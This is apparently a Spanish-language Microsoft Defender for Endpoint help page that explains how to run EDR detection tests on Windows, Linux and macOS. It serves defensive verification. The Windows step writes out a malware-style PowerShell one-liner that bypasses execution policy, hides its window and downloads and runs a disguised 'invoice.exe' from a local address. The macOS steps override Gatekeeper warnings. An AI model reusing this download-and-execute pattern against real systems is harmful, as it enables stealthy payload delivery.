Compartir a través de

Prueba de detección de EDR para comprobar la incorporación y los servicios de informes del dispositivo

  • Se aplica a: Microsoft Defender for Endpoint Plan 2, Microsoft Defender for Business

Requisitos previos

  • Los dispositivos cliente de Windows deben ejecutar Windows 11, Windows 10 versión 1709 compilación 16273 o posterior, Windows 8.1 o Windows 7 SP1.
  • Los dispositivos windows server deben ejecutar Windows Server 2008 R2 SP1, Windows Server 2012 R2 y versiones posteriores, o bien azure Stack HCI OS, versión 23H2 y posteriores.
  • Los servidores Linux deben ejecutar una versión compatible (consulte Requisitos previos para Microsoft Defender para punto de conexión en Linux).
  • Los dispositivos deben incorporarse a Defender para punto de conexión

La detección y respuesta de puntos de conexión para punto de conexión proporcionan detecciones avanzadas de ataques casi en tiempo real y accionables. Los analistas de seguridad pueden asignar prioridades a las alertas de forma eficaz, obtener visibilidad para todo el ámbito de la vulneración y llevar a cabo acciones de respuesta para corregir las amenazas. Puede ejecutar una prueba de detección de EDR para comprobar que el dispositivo está incorporado correctamente e informar al servicio. En este artículo se describe cómo ejecutar una prueba de detección de EDR en un dispositivo recién incorporado.

Windows

  1. Abra una ventana del símbolo del sistema.

  2. En el símbolo del sistema, copie y ejecute el siguiente comando. La ventana del símbolo del sistema se cierra automáticamente.

    powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'

  3. Si se realiza correctamente, la prueba de detección se marca como completada y aparece una nueva alerta en unos minutos.

Linux

  1. Descargue el archivo de script en un servidor Linux incorporado.

    curl -o ~/Downloads/MDE-Linux-EDR-DIY.zip -L https://aka.ms/MDE-Linux-EDR-DIY

  2. Extraiga la carpeta comprimida.

    unzip ~/Downloads/MDE-Linux-EDR-DIY.zip

  3. Ejecute el siguiente comando para conceder al script permiso ejecutable:

    chmod +x ./mde_linux_edr_diy.sh

  4. Ejecute el siguiente comando para ejecutar el script:

    ./mde_linux_edr_diy.sh

    Después de unos minutos, se debe generar una detección en el portal de Microsoft Defender. Examine los detalles de la alerta, la escala de tiempo de la máquina y realice los pasos de investigación típicos.

macOS

  1. En el explorador, Microsoft Edge para Mac o Safari, descargue MDATP macOS DIY.zip de https://aka.ms/mdatpmacosdiy y extraiga la carpeta comprimida.

    Aparece el mensaje siguiente:

    ¿Desea permitir descargas en "mdatpclientanalyzer.blob.core.windows.net"?
    Puede cambiar qué sitios web pueden descargar archivos en Preferencias de sitios web.

  2. Seleccione Permitir.

  3. Abra Descargas.

  4. Debe poder ver MDATP MacOS DIY.

    Sugerencia

    Si hace doble clic en MDATP MacOS DIY, recibirá el siguiente mensaje:

    No se puede abrir "MDATP MacOS DIY" porque no se puede comprobar al desarrollador.
    macOS no puede comprobar que esta aplicación está libre de malware.
    [Mover a la papelera][Listo]

  5. Haga clic en Listo.

  6. Haga clic con el botón derecho en MDATP MacOS DIYy, a continuación, haga clic en Abrir.

    El sistema muestra el siguiente mensaje:

    macOS no puede comprobar el desarrollador de MDATP MacOS DIY. ¿Está seguro de que desea abrirlo?
    Al abrir esta aplicación, se reemplazará la seguridad del sistema que puede exponer su equipo y la información personal a malware que puede dañar su Mac o poner en peligro su privacidad.

  7. Haga clic en Open (Abrir).

    El sistema muestra el siguiente mensaje:

    Microsoft Defender para punto de conexión: archivo de prueba de bricolaje de macOS EDR
    La alerta correspondiente estará disponible en el portal de MDATP.

  8. Haga clic en Open (Abrir).

    En pocos minutos, se genera una alerta de prueba de macOS EDR .

  9. Vaya a Microsoft Defender portal (https://security.microsoft.com/).

  10. Vaya a la cola de alertas .

    Captura de pantalla que muestra una alerta de prueba de macOS EDR que muestra la gravedad, la categoría, el origen de detección y un menú contraído de acciones

    La alerta de prueba de EDR de macOS muestra la gravedad, la categoría, el origen de detección y un menú contraído de acciones. Examine los detalles de la alerta y la escala de tiempo del dispositivo y realice los pasos de investigación normales.

Pasos siguientes

Si tiene problemas con la compatibilidad o el rendimiento de las aplicaciones, puede considerar la posibilidad de agregar exclusiones. Consulte los artículos siguientes para obtener más información:

Consulte también la Guía de operaciones de seguridad de Microsoft Defender para punto de conexión.

  • Last updated on